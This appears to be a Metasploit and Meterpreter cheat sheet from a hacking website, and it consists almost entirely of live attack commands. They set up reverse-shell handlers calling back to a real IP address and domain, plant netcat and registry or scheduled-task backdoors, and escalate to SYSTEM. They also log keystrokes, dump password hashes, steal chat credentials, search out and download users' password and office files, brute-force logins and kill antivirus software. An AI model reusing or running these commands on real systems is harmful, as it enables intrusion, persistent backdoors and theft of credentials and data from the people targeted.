Metasploit Cheatsheet - HackersOnlineClub

Uploaded by

Patel Jitendra
http://www.hackersonlineclub.com/metasploit-tutorial/metasploit-chea...

Metasploit Cheatsheet


Cheat sheet of Metasploit. Commands are as follows:


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
___________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

# vnc / port fwd for linux
run vnc
___________________________________
# priv esc
run kitrap0d

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4

exploit -j -z
______________________________________________________________
___________________________________


wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf
./msfconsole

___________________________________

run getgui
___________________________________


db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav
run winemun
run memdump

setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1

run screen_unlock
___________________________________

upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
___________________________________
getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________
getuid
enumdesktops
grabdesktop
______________________________________________________________
# shows all the scripts
run [tab]
______________________________________________________________
# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30
______________________________________________________________
run get_pidgin_creds
idletime
sysinfo
______________________________________________________________
# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell
______________________________________________________________
# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"
______________________________________________________________
# escalate to system
use priv
getsystem
______________________________________________________________
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
______________________________________________________________
# list top used apps
run prefetchtool -x 20
______________________________________________________________
# list installed apps
run prefetchtool -p
______________________________________________________________
run get_local_subnets
______________________________________________________________
# file_autopwn (continued)
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run


# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop" passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
______________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
______________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
______________________________________________________________

run deploymsf -f framework3.3-dev.exe

# does some run wmic commands etc
run winenum

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254
___________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
___________________________________
# upload a script or executable and run it
uploadexec
___________________________________

# Using Payload As A Backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
___________________________________
# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy


Cheatsheet by Kislay Bhardwaj. He is a Security Researcher.
